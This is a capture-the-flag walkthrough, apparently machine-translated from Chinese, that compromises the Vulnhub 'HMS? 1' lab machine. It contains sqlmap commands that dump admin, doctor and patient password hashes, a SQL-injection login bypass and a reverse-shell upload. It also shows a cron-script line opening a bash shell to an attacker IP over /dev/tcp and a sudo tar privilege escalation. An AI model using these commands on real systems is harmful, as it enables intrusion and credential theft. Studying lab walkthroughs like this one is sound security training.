Vulnhub刷题记录 (2: 1)

• Product Name:HMS?: 1
• Chinese name: Huh? ：1
• Published on July 28, 2021
• Difficulty: Easy
• Description: This applies to VirtualBox and not VMware
• Download: https://www.vulnhub.com/entry/hms-1,728/

AILX10

Excellent answerer in cybersecurity

Master's in Cybersecurity

Go to consult

1. Host discovery (192.168.199.149)

Host discovery

2. Port scanning (21, 22)

Port scanning

3. Log in to FTP anonymously and find that it is the Air Force, which is empty

Log in to FTP anonymously

4. Re-scan ports (21, 22, 7080)

nmap -sS 192.168.199.149 -p1-65535           

Full port scanning

5. Visit the page

Visit the page

6. burp agent, try to access

Burp Proxy

7. Detect whether there is SQL injection

SQL injection is present

8. SQLmap detection

1、探测数据库
sqlmap -u "http://192.168.199.149:7080/login.php" --data="user=admin&email=ailx10%40qq.com&password=123456&btn_login="  --current-db

current database: 'clinic_db'

2、探测表
sqlmap -u "http://192.168.199.149:7080/login.php" --data="user=admin&email=ailx10%40qq.com&password=123456&btn_login="  -D clinic_db --tables

[24 tables]
+----------------------+
| user                 |
| admin                |
| appointment          |
| billing              |
| billing_records      |
| department           |
| doctor               |
| doctor_timings       |
| manage_website       |
| medicine             |
| orders               |
| patient              |
| payment              |
| prescription         |
| prescription_records |
| room                 |
| service_type         |
| tbl_email_config     |
| tbl_permission       |
| tbl_permission_role  |
| tbl_role             |
| tbl_sms_config       |
| treatment            |
| treatment_records    |
+----------------------+


3、探测表结果
sqlmap -u "http://192.168.199.149:7080/login.php" --data="user=admin&email=ailx10%40qq.com&password=123456&btn_login="  -D clinic_db -T admin --columns

Database: clinic_db
Table: admin
[17 columns]
+---------------+---------------+
| Column        | Type          |
+---------------+---------------+
| addr          | varchar(500)  |
| created_on    | date          |
| delete_status | int(11)       |
| dob           | text          |
| fname         | varchar(50)   |
| gender        | varchar(500)  |
| id            | int(11)       |
| image         | varchar(2000) |
| last_login    | date          |
| lname         | varchar(500)  |
| loginid       | varchar(30)   |
| mobileno      | text          |
| notes         | varchar(200)  |
| password      | varchar(100)  |
| role_id       | int(11)       |
| updated_on    | date          |
| username      | varchar(500)  |
+---------------+---------------+


4、拖库
sqlmap -u "http://192.168.199.149:7080/login.php" --data="user=admin&email=ailx10%40qq.com&password=123456&btn_login="  -D clinic_db -T admin -C username,password --dump

Database: clinic_db
Table: admin
[1 entry]
+----------+------------------------------------------------------------------+
| username | password                                                         |
+----------+------------------------------------------------------------------+
| admin    | aa7f019c326413d5b8bcad4314228bcd33ef557f5d81c7cc977f7728156f4357 |
+----------+------------------------------------------------------------------+
           

9. The same technique, without explicit

+-----------------+------------------------------------------------------------------+
| doctorname      | password                                                         |
+-----------------+------------------------------------------------------------------+
| Dr. Akash Ahire | bbcff4db4d8057800d59a68224efd87e545fa1512dfc3ef68298283fbb3b6358 |
+-----------------+------------------------------------------------------------------+

+-------------+------------------------------------------------------------------+
| patientname | password                                                         |
+-------------+------------------------------------------------------------------+
| Atul Petkar | bbcff4db4d8057800d59a68224efd87e545fa1512dfc3ef68298283fbb3b6358 |
+-------------+------------------------------------------------------------------+           

10. Try the universal password injected by SQL in burp and log in successfully

Replace your email address with a universal password

Successfully logged in

11. View the source code

Check out the source code

12. Visit the page

Visit the page

13. Upload the bounce shell

Upload the bounce shell

14. The rebound was successful

The rebound was successful

15. Find a normal flag

Normal flag

16. Look for privileged documents

find / -perm -u=s -type f -exec ls -al {} \;   2>&1 | grep -v "Permission denied"           

Look for privileged files

17. AT No Authority

No permissions

18. View scheduled tasks

$ cat /home/eren/backup.sh
#!/bin/bash
BACKUP_DIR="/home/eren/backups"
tar -zcvpf $BACKUP_DIR/backup.tar.gz /var/www/html
           

View scheduled tasks

19. Switch the identity, write the bounce shell to the scheduled task, and wait for 5 minutes

echo "bash -i >& /dev/tcp/192.168.199.247/7777 0>&1" >> /home/eren/backup.sh
           

Write a scheduled task

After 5 minutes, get the shell

20. tar elevates privileges to obtain the flag of root

sudo -u root tar cf /dev/null exploit --checkpoint=1 --checkpoint-action=exec="/bin/bash"
           

TAR escalation

At this point, the experiment is complete~

Published on 2022-08-28 19:08